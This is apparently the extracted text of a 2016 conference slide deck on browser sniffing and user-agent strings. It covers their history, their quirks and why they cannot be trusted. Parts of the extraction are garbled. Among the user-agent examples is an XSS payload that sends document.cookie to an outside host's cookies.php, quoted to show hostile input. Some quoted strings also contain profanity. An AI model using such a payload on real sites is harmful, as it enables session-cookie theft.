ev ! ybody lies N iels Leenheer halfstack, november 18th 2016 @html5test

this talk is full of 
 lies and deception w " ning:

this talk is about browser sniffing yes…

why?

browser sniffing is 
 dirty

you should use 
 f eature detection

De " Web Devel #! s: 
 Br $ s ! Sniffing is Stupid http://www.webstandards.org/2002/12/20/dear-web-developers-browser-sniffing-is-stupid/

5 Reas % s Why 
 Br $ s ! Sniffing Stinks https://www.sitepoint.com/why-browser-sniffing-stinks/

Br $ s ! Detecti % is Bad https://css-tricks.com/browser-detection-is-bad/

feature 
 detection responsive 
 design progressive 
 enhancement best-practices

anti-pa &! n browser sniffing

browser sniffing is just a tool

everybody uses 
 browser sniffing

is browser sniffing 
 actually? what…

the http specification defines the user-agent header 
 
 it contains a string with information about the browser

every request the browser makes to the server includes the user-agent header

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net 


GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net 
 HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 
 <!doctype html>

<html> <head>

you can access 
 the exact same string 
 using javascript

<script type=“text/javascript"> 
 <!-- 
 
 alert(navigator.userAgent); 
 
 //--> 
 </script>




you can use the user-agent string to identify: 
 
 the browser 
 the rendering engine 
 the operating system 
 the device model 
 and more

is browser sniffing 
 good for? what…

knowledge

if you know the platform or browser, 
 you can streamline the user experience

if you know your users, 
 you can build a better site for them

if you know which browser is being 
 used, you can work around bugs

if you know which browser is causing errors, you can fix them

privacy implications

changing your user agent 
 string actually makes it 
 easier to track you

anonymity by looking 
 like everybody else

is browser sniffing 
 so difficult? why…

things started out simple

Mosaic/0.9 Mosaic

Mozilla/1.0 (Win3.1 ) Netscape Navigator code name of 
 the browser

but it quickly started 
 to get complicated

Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) Internet Explorer compatible with 
 Netscape Navigator 1.0

Opera/8.54 (Windows 95 ; U; en) Opera

Opera/10.00 (Windows NT 5.1; U; en) 
 Presto/2.2.0 Opera

Opera/9.8 (Windows NT 5.1; U; en)


 Presto/2.2.0 Version/10.00 Opera real version of 
 the browser

Mozilla/5.0 
 (Windows; U; Windows NT 6.0; en; rv:1.9.1) 
 Gecko/20090624 Firefox/3.5 Firefox build date of 
 the rendering engine

Mozilla/5.0 ( Windows NT 6.0; rv:2.0) 
 Gecko/20100101 Firefox/4.0 Firefox build date is no 
 longer updated

Mozilla/5.0 ( Windows NT 6.0; rv:16.0) 
 Gecko/16.0 Firefox/16.0 Firefox

and it gets worse…

Mozilla/5.0 
 ( Macintosh; U; PPC Mac OS X 10_4_11; en) 
 AppleWebKit/525.27.1 (KHTML, like Gecko) 
 Version/3.2.3 Safari/525.28.3 Safari

Mozilla/5.0 
 ( Windows; U; Windows NT 6.0; en) 
 AppleWebKit/525.27.1 (KHTML, like Gecko) 
 Chrome/15.0.874.120 Safari/525.28.3 Chrome

Mozilla/5.0 
 (Windows NT 10.0; WOW64) 
 AppleWebKit/537.36 (KHTML, like Gecko) 
 Chrome/44.0.2403.155 Safari/537.36 
 OPR/31.0.1889.180 Opera

Mozilla/5.0 
 ( Windows NT 6.3; Trident/7.0; rv:11.0) 
 like Gecko Internet Explorer

Mozilla/5.0 ( Windows NT 10.0) 
 AppleWebKit/537.36 (KHTML, like Gecko) 
 Chrome/42.0.2311.135 Safari/525.28.3 
 Edge/12.10162 Edge

and those were all relatively normal user-agent strings

sometimes browsers simply do not make sense at all

Mozilla/5.0 (Linux; Android 4.3; en; 
 SAMSUNG GT-I9505 Build/JSS15J) 
 AppleWebKit/537.36 (KHTML, like Gecko) 
 Version/1.5 Chrome/28.0.1500.94 
 Mobile Safari/537.36 Samsung Internet

Mozilla/5.0 (Series40; NOKIALumia800; 
 Profile/MIDP-2.1 Configuration/CLDC-1.1) 
 Gecko/20100401 S40OviBrowser/1.8.0.50.5 Nokia Xpress for Windows Phone

sometimes browsers lie to 
 hide their true identity

Opera/9.80 (X11; Linux zbov; U; en) 
 Presto/2.9.201 Version/11.50 Opera

Opera/9.80 (X11; Linux zbov; U; en) 
 Presto/2.9.201 Version/11.50 Opera Mobile
(desktop mode) ROT 13 encrypted 
 “mobi“

Mozilla/5.0 (compatible; MSIE 8.0; 
 Windows NT 6.1; Trident/5.0 ) Internet Explorer

Mozilla/5.0 (compatible; MSIE 8.0; 
 Windows NT 6.1; Trident/5.0) Internet Explorer
(compatibility view ) Trident 5 means it’s 
 Internet Explorer 9

sometimes browsers 
 are just weird

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

Mozilla/4.0 (compatible; 
 MSIE 6.0; MSIE 5.5; Windows NT 5.0) 
 Opera 7.02 Bork-edition [en] #1 #2

BORK BORK BORK

and it is possible to change the user-agent string yourself

<script>alert("My Little Pony");</script> <script language="JavaScript">document.location= 
 "http://www.max1094.18.lc/admin/cookies.php?c=" + 
 document.cookie;</script>

<img src="http://bravo.trollab.org/mylittlepony.png" 
 alt="My Little Pony"> XSS attacks

XSS attacks


 ( ╯ ° □ ° ) ╯ ︵

┻━┻ 
 
 Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit)

You’re site is ! funny people

angry people

FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) 
 FuckYou/123.0 FuckingFox/321.0 
 
 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) 
 Presto/2.10.229 Version/11.62 
 
 Seriously, Go fuck yourself 
 
 W3C standards are important.

 Stop fucking obsessing over user-agent already.

angry people

1.000.000 
 unique 
 useragent strings 82 x fuck 10 x shit 6 x ass 9 x dick 3 x vagina 108 x sex 4 x balls

user-agent strings 
 cannot be trusted!

ev ! ybody lies

use browser sniffing for controlling access to 
 your website y ! sh ! ld nev "

y ! sh ! ld nev " use browser sniffing for determining browser capabilities

y ! sh ! ld nev " build your own 
 browser sniffing library 


use a browser sniffing library that 
 is regularly updated #1

check if it is possible
to automatically schedule updates #2

“If you tell a big enough lie 
 and tell it frequently enough, 
 it will be believed” — Ghandi

“If you tell a big enough lie 
 and tell it frequently enough, 
 it will be believed” — Ghandi

— Adolf Hitler “If you tell a big enough lie 
 and tell it frequently enough, 
 it will be believed”

thank you!

thank you!